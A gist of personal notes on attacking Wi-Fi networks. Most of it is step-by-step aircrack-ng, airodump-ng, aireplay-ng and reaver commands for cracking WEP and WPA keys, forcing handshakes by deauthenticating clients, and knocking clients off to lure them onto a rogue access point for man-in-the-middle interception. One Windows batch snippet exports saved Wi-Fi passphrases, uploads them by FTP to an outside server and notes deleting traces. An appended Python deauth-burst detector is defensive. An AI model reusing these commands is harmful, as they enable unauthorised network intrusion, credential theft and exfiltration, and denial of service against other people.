
@vv01f
Created February 16, 2016 15:12
some notes I made a while ago; for WEP, WPA and WPA2

you need

  • Kali Linux distribution
  • external Alfa card and antenna

wardriving

capturing

list interfaces

airmon-ng

shows the available interfaces

enable monitor mode

airmon-ng start wlan0

enables monitor mode and lists all processes that may cause trouble, e.g. dhclient (DHCP client), NetworkManager or wpa_supplicant.

ensure no disturbance

kill 2222

so we just kill those processes (2222 being the PID from the list); repeat if there are more.

find target

airodump-ng wlan0

now the available APs are shown with some properties.

for WEP

copy the BSSID (MAC address) of the target AP with WEP as CIPHER.

capture the data

airodump-ng -c 10 -w dumpfile --bssid ${mac} mon0

now it is listening for data. wait for #Data to be high

auth and cause traffic

beware, this is not to be used on foreign networks; it can alert an IDS

aireplay-ng -1 0 -a ${mac} mon0

ask for authentication

aireplay-ng -1 1 -a ${mac} mon0

cause traffic; check whether #Data goes up, otherwise the channel is wrong. if it is wrong, cancel and restart

aireplay-ng -3 -b ${mac} mon0

wait for an ARP request

aircrack-ng dumpfile-0.cap

tries to crack; if it fails, try the next cap file

if it succeeds, the key is found

WPA/WPA2

for WPA you need to force an authentication by a client

you will need a very good dictionary to crack the key

start monitor

airmon-ng start wlan0

kill the listed processes

get BSSID of target

airodump-ng wlan0

copy the desired MAC address and memorize the channel

new terminal

airodump-ng -c $chan --bssid $mac -w ~/Desktop/dumpfile mon0

dumps the data; here handshakes are needed, not just data. you also see some more MACs of connected stations that we soon need

force new handshakes

stop scanning instances if still running

aireplay-ng -0 2 -a ${ap_mac} -c ${client_mac} mon0

repeat until it runs on the correct channel

this deauthenticates the client, and the other instance captures the new handshake

cracking the cap file

after collecting some handshakes you can start the crack

aircrack-ng -a 2 -b ${ap_mac} -w wordlistfile ~/Desktop/*.cap

using reaver

an alternative to wordlists is WPS; reaver can obtain the password there

newer versions of WPS are not vulnerable any more

using windows

in case the wifi is secured properly you might attack a client instead; e.g. windows is a good place to find the passphrases in

on the machine try

copy passphrase

mkdir c:\temp
netsh wlan export profile folder=c:\temp
:: netsh wlan add profile filename="theXMLexport.xml"

note that events on windows are logged by the event manager!

::just to copy the file to a remote machine
@ftp -i -s:"%~f0"&GOTO:EOF
open server.net
my_username
my_password
!:---FTP commands following here---
cd location/for/storage
mput c:\Temp\*.xml
disconnect
quit
::now delete traces

this is a batch snippet for connecting to ftp (the file feeds itself to ftp as a script)

show the plaintext passphrase on windows

netsh
netsh> wlan add profile filename="theXMLexport.xml" user=all
netsh> wlan show profiles

then open the network settings for wifi; there you can show the key

DoS AP

list networks again

copy the mac

find connected clients

airodump-ng -c $channel --bssid ${ap_mac} mon0

now again you see the clients connected to the AP listed below. this can also be done in the first instance using hotkeys: a for switching views and s for sorting. try finding an active client, where a DoS has a point

disconnect the target

aireplay-ng --deauth 1000 -a ${ap_mac} -c ${client_mac} mon0

this causes the client to lose its connection and probably reconnect manually

now you can put up a rogue AP that the client wants to connect to; after that you have the possibility to be MITM of this client's connections as long as they are not e2e encrypted
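as an added, defender-side example that is not part of these notes: a small detector for the deauthentication bursts that both the handshake-capture step and the DoS step above rely on, run over constructed 802.11 management-frame records (the MAC addresses, timestamps and reason codes are made up). a single deauth from an AP is normal; many in a second from one sender is what a WIDS should flag.

```python
from collections import defaultdict, deque

# 802.11 management frame subtypes (frame type 0)
SUBTYPE_BEACON = 8
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12

# Constructed sample records: (timestamp_s, subtype, src_mac, dst_mac, reason_code).
# All addresses are made up; AP is the legitimate BSSID whose address the burst spoofs.
AP = "aa:bb:cc:dd:ee:01"
CLIENT = "11:22:33:44:55:66"
SAMPLE_FRAMES = [
    (0.00, SUBTYPE_BEACON, AP, "ff:ff:ff:ff:ff:ff", None),
    (0.50, SUBTYPE_DEAUTH, AP, "22:33:44:55:66:77", 3),  # one legit deauth, STA leaving
    (5.00, SUBTYPE_BEACON, AP, "ff:ff:ff:ff:ff:ff", None),
] + [
    # burst: 8 deauths within 0.35 s, all claiming to come from the AP, aimed at one client
    (10.0 + i * 0.05, SUBTYPE_DEAUTH, AP, CLIENT, 7) for i in range(8)
]


def detect_deauth_bursts(frames, window=1.0, threshold=5):
    """Flag every sender that emits at least `threshold` deauth/disassoc frames
    inside any sliding window of `window` seconds.
    Returns {src_mac: (first_ts_of_window, count_when_flagged, reason_codes_seen)}."""
    recent = defaultdict(deque)   # per-sender timestamps still inside the window
    reasons = defaultdict(set)    # per-sender reason codes, useful context for triage
    alerts = {}
    for ts, subtype, src, _dst, reason in sorted(frames, key=lambda f: f[0]):
        if subtype not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        q = recent[src]
        q.append(ts)
        reasons[src].add(reason)
        while ts - q[0] > window:  # q is never empty here: ts itself was just appended
            q.popleft()
        if len(q) >= threshold and src not in alerts:
            alerts[src] = (q[0], len(q), set(reasons[src]))
    return alerts


if __name__ == "__main__":
    for src, (first, count, codes) in detect_deauth_bursts(SAMPLE_FRAMES).items():
        print(f"ALERT deauth burst from {src}: {count} frames since t={first:.2f}s, "
              f"reason codes {sorted(codes)}")
```

the sliding window is kept per sender, so a spoofed BSSID is flagged even though the real AP sends the occasional legitimate deauth.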
